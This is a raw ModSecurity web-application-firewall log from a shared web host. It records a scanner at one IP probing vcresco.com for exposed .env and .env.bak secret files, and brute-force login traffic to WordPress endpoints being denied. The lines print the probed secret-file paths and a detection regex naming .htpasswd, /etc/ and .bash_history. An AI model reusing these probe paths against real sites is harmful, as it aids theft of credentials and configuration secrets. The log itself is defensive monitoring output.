[Tue May 26 13:04:24.383455 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8XgAAAIw"]
[Tue May 26 13:04:24.387910 2026] [security2:error] [pid 485064:tid 485229] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8XQAAAKg"]
[Tue May 26 13:04:24.435842 2026] [security2:error] [pid 485064:tid 485249] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8ZwAAALw"]
[Tue May 26 13:04:24.484378 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8cAAAAIk"]
[Tue May 26 13:04:24.580283 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fQAAAPc"]
[Tue May 26 13:04:24.581132 2026] [security2:error] [pid 485064:tid 485242] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fgAAALU"]
[Tue May 26 13:04:24.581806 2026] [security2:error] [pid 485064:tid 485266] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fAAAAM0"]
[Tue May 26 13:04:24.582043 2026] [security2:error] [pid 485064:tid 485230] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fwAAAKk"]
[Tue May 26 13:04:24.629992 2026] [security2:error] [pid 485064:tid 485295] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8UwAAAOo"]
[Tue May 26 13:04:24.954270 2026] [security2:error] [pid 485064:tid 485069] [remote 46.101.75.237:41508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVNAD9tlF55stOmSqH8nAAA3QQ"]
[Tue May 26 13:04:24.999546 2026] [security2:error] [pid 485064:tid 485306] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8pgAAAPU"]
[Tue May 26 13:04:25.072951 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public/.env"] [unique_id "ahVNAT9tlF55stOmSqH8qgAAAMM"]
[Tue May 26 13:04:25.201703 2026] [security2:error] [pid 485064:tid 485227] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8vwAAAKY"]
[Tue May 26 13:04:25.229165 2026] [security2:error] [pid 485064:tid 485309] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8xwAAAPg"]
[Tue May 26 13:04:25.489895 2026] [security2:error] [pid 485064:tid 485225] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8-QAAAKQ"]
[Tue May 26 13:04:25.647955 2026] [security2:error] [pid 485064:tid 485216] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9AgAAAJs"]
[Tue May 26 13:04:25.679436 2026] [security2:error] [pid 485064:tid 485267] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9BQAAAM4"]
[Tue May 26 13:04:25.768730 2026] [security2:error] [pid 485064:tid 485268] [client 157.20.138.61:64377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNAT9tlF55stOmSqH9BwAAAM8"]
[Tue May 26 13:04:25.769241 2026] [security2:error] [pid 485064:tid 485268] [client 157.20.138.61:64377] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNAT9tlF55stOmSqH9BwAAAM8"]
[Tue May 26 13:04:25.780665 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9HQAAAN0"]
[Tue May 26 13:04:25.863098 2026] [security2:error] [pid 485064:tid 485229] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9JQAAAKg"]
[Tue May 26 13:04:26.049784 2026] [security2:error] [pid 485064:tid 485211] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9MQAAAJY"]
[Tue May 26 13:04:26.137005 2026] [security2:error] [pid 485064:tid 485286] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9OgAAAOE"]
[Tue May 26 13:04:26.144054 2026] [security2:error] [pid 485064:tid 485281] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9QQAAANw"]
[Tue May 26 13:04:26.144084 2026] [security2:error] [pid 485064:tid 485253] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9QgAAAMA"]
[Tue May 26 13:04:26.221181 2026] [security2:error] [pid 485064:tid 485212] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/s3/.env.bak"] [unique_id "ahVNAj9tlF55stOmSqH9WgAAAJc"]
[Tue May 26 13:04:26.245387 2026] [security2:error] [pid 485064:tid 485275] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9VwAAANY"]
[Tue May 26 13:04:26.290858 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9YAAAALc"]
[Tue May 26 13:04:26.322307 2026] [security2:error] [pid 485064:tid 485287] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ZgAAAOI"]
[Tue May 26 13:04:26.332348 2026] [security2:error] [pid 485064:tid 485270] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ZQAAANE"]
[Tue May 26 13:04:26.338334 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9aQAAAQE"]
[Tue May 26 13:04:26.394394 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9cQAAAO0"]
[Tue May 26 13:04:26.407027 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9dQAAAIw"]
[Tue May 26 13:04:26.545922 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hQAAAK8"]
[Tue May 26 13:04:26.555174 2026] [security2:error] [pid 485064:tid 485227] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hgAAAKY"]
[Tue May 26 13:04:26.560419 2026] [security2:error] [pid 485064:tid 485296] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hwAAAOs"]
[Tue May 26 13:04:26.582850 2026] [security2:error] [pid 485064:tid 485280] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9igAAANs"]
[Tue May 26 13:04:26.590464 2026] [security2:error] [pid 485064:tid 485204] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9jQAAAI8"]
[Tue May 26 13:04:26.659264 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lAAAAQM"]
[Tue May 26 13:04:26.661247 2026] [security2:error] [pid 485064:tid 485219] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lgAAAJ4"]
[Tue May 26 13:04:26.704457 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/.env"] [unique_id "ahVNAj9tlF55stOmSqH9mAAAAJg"]
[Tue May 26 13:04:26.712761 2026] [security2:error] [pid 485064:tid 485225] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lwAAAKQ"]
[Tue May 26 13:04:26.758813 2026] [security2:error] [pid 485064:tid 485250] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9bAAAAL0"]
[Tue May 26 13:04:26.785120 2026] [security2:error] [pid 485064:tid 485247] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/backend/.env"] [unique_id "ahVNAj9tlF55stOmSqH9nAAAALo"]
[Tue May 26 13:04:26.837873 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ogAAALc"]
[Tue May 26 13:04:26.964305 2026] [security2:error] [pid 485064:tid 485290] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9pgAAAOU"]
[Tue May 26 13:04:26.995547 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/api/.env"] [unique_id "ahVNAj9tlF55stOmSqH9qAAAAN0"]
[Tue May 26 13:04:27.016164 2026] [security2:error] [pid 485064:tid 485274] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9pwAAANU"]
[Tue May 26 13:04:27.034032 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9qgAAAN8"]
[Tue May 26 13:04:27.039141 2026] [security2:error] [pid 485064:tid 485297] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9rgAAAOw"]
[Tue May 26 13:04:27.045075 2026] [security2:error] [pid 485064:tid 485262] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9sgAAAMk"]
[Tue May 26 13:04:27.065159 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9tQAAAIw"]
[Tue May 26 13:04:27.072708 2026] [security2:error] [pid 485064:tid 485272] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9tgAAANM"]
[Tue May 26 13:04:27.075376 2026] [security2:error] [pid 485064:tid 485217] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/service/.env"] [unique_id "ahVNAz9tlF55stOmSqH9uwAAAJw"]
[Tue May 26 13:04:27.079257 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9uQAAAJA"]
[Tue May 26 13:04:27.117662 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/services/.env"] [unique_id "ahVNAz9tlF55stOmSqH9vwAAAPY"]
[Tue May 26 13:04:27.148696 2026] [security2:error] [pid 485064:tid 485233] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9wAAAAKw"]
[Tue May 26 13:04:27.150275 2026] [security2:error] [pid 485064:tid 485211] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9xQAAAJY"]
[Tue May 26 13:04:27.151802 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9yAAAAPc"]
[Tue May 26 13:04:27.174016 2026] [security2:error] [pid 485064:tid 485231] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9ywAAAKo"]
[Tue May 26 13:04:27.188773 2026] [security2:error] [pid 485064:tid 485226] [client 31.57.184.107:62726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahVNAz9tlF55stOmSqH9ugAAAKU"]
[Tue May 26 13:04:27.218455 2026] [security2:error] [pid 485064:tid 485255] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9zgAAAMI"]
[Tue May 26 13:04:27.225537 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH93QAAAIk"]
[Tue May 26 13:04:27.225577 2026] [security2:error] [pid 485064:tid 485280] [client 195.178.110.199:42450] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH91gAAANs"]
[Tue May 26 13:04:27.294328 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shared/.env"] [unique_id "ahVNAz9tlF55stOmSqH-BgAAAJg"]
[Tue May 26 13:04:27.299555 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-BQAAALE"]
